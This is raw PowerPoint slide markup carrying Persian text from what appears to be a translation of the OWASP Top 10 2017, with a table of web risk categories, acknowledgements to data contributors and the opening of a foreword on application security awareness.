          <a:off x="495299" y="2972780"/>
          <a:ext cx="5867402" cy="1293912"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="338504">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4995497">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="533401">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="215652">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="ctr">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fa-IR"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افشای اطلاعات خصوصی </a:t>
                      </a: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t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR"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نقض حریم شخصی</a:t>
                      </a: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fa-IR"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شکست های رمزنگاری</a:t>
                      </a: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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR"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دیتای غیرقابل اعتماد</a:t>
                      </a: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fa-IR"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دورزدن احراز هویت توسط کلید تحت کنترل کاربر</a:t>
                      </a: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(IDOR* </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR"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و</a:t>
                      </a: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fa-IR"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لاگینگ و مانیتورینگ نا کارآمد</a:t>
                      </a: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pPr algn="ctr" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>تشکر و قدردانی</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 14"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1748606931"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="939600"/>
          <a:ext cx="6858000" cy="13628815"/>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7848">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>تشکر از به اشتراک گذارندگان دیتا</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0"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3628289">
                <a:tc>
                  <a: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sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>مایلیم از سازمان هایی که دیتای خود را برای حمایت از بروزرسانی ۲۰۱۷ در اختیارمان قرار دادند تشکر کنیم :</a:t>
                      </a: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Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="2000" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:endParaRPr lang="en-US" sz="20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2000" u="none" kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1000" u="none" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>برای اولین بار تمام دیتایی که از مشارکت کنندگان جمع آوری شده است به صورت عمومی قابل دسترس است : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1000" u="none" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>به صورت عمومی در اینجا در دسترس است</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100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r h="337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a-IR"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تشکر از افراد به اشتراک گذارنده دیتا</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2608774898"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4662415">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مایلیم از افرادی که ساعت ها صرف جمع آوری و به اشتراک گذاری دیتا با </a:t>
                      </a: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 OWASP TOP 10 -2017 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR"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کردند تشکر کنیم</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fa-IR" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>و هر فرد دیگری که از طریف توییر یا ایمیل یا موارد دیگر فیدبک ارسال کرد.</a:t>
                      </a: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a-IR" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Liberation Sans" panose="020B0604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fa-IR" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>فراموش نمی کنیم که اشاره کنیم که </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> DIRK Wetter</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>، </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>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t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> و </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> همکاری بسیار خوبی داشتند. همچنین </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>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t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> و</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Gabriel Lawrence </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> حمایت بسیار با ارزشی در نگارش </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A8:2017- </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="1" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>ریسک دیسریالیزیشن ناامن</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> به عمل آوردند.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="95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3113917270"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4662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2987151436"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C6CA28A-C875-42F4-A969-9E4EBCDC2625}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5448055"/>
            <a:ext cx="6858000" cy="3364124"/>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 xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81EC5A71-CDF7-40E6-9F8A-7B7F0554B2F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8722" y="1577625"/>
            <a:ext cx="6849278" cy="2876605"/>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fa-IR" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ساده</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>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2878630374"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1082570"/>
          <a:ext cx="6858000" cy="9434915"/>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9336">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" b="0" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>پیش</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" b="0" baseline="0" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" b="0" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>گفتار</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0"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6762865">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1"/>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>برنامه کاربردی ناامن، زیرساخت‌های مالی، مراقبتی ، دفاعی ، انرژی و دیگرزیرساخت های حساس و بحرانی ما را تضعیف میکند. مادامی که نرم افزار ما به مرور پیچیده تر شده و ارتباطش بیشتر میشود، مشقت رسیدن به امنیت برنامه هم به صورت فزاینده ای افزایش میابد.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1"/>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>سرعت توسعه نرم افزارهای جدید ، کشف خطرهای معمول و برطرف کردن آنها به صورت سریع و دقیق را الزامی میکند. ما دیگر قادر به پذیرش نقص های امنیتی نسبتا ساده، شبیه مواردی که در این </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> OWASP TOP 10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>ارائه شده‌اند نیستیم.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1"/>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>مقدار قابل توجهی بازخورد، بیشتر از تمام موارد پیشین </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>OWASP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>، در طول ساخت </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>OWASP TO 10 – 2017  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> دریافت شد. این نشان میدهد که جامعه در مورد </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>OWASP TOP 10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> چقدر اشتیاق دارد و بنابراین برای </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> اینکه ده مورد برتر را به درستی و براساس بیشترین استفاده مشخص کند چقدر با اهمیت است.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1"/>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>با اینکه هدف اصلی </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>OWASP TOP 10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> به صورت خلاصه افزایش آگاهی میان توسعه دهندگان و مدیران بود، با این حال تبدیل به استاندارد امنیتی بالفعل برنامه ها شده است.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1"/>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>در این نسخه، مشکلات و توصیه ها به صورت مختصر و قابل تست با اقتباس از </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>OWASP TOP 10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> در برنامه های امنیت نرم افزار نوشته شده اند. ما توصیه میکنیم که سازمان های بزرگ و با فعالیت بالا، از </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>OWASP APPLICATION SECURITY VERIFICATION  STANDARD (ASVS)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> استفاده کنند ، در صورتی که یک استاندارد واقعی مورد نیاز است.اما برای اکثریت، </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>OWASP TOP 10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> یک شروع خوب در مسیر امنیت برنامه می‌باشد.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1"/>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
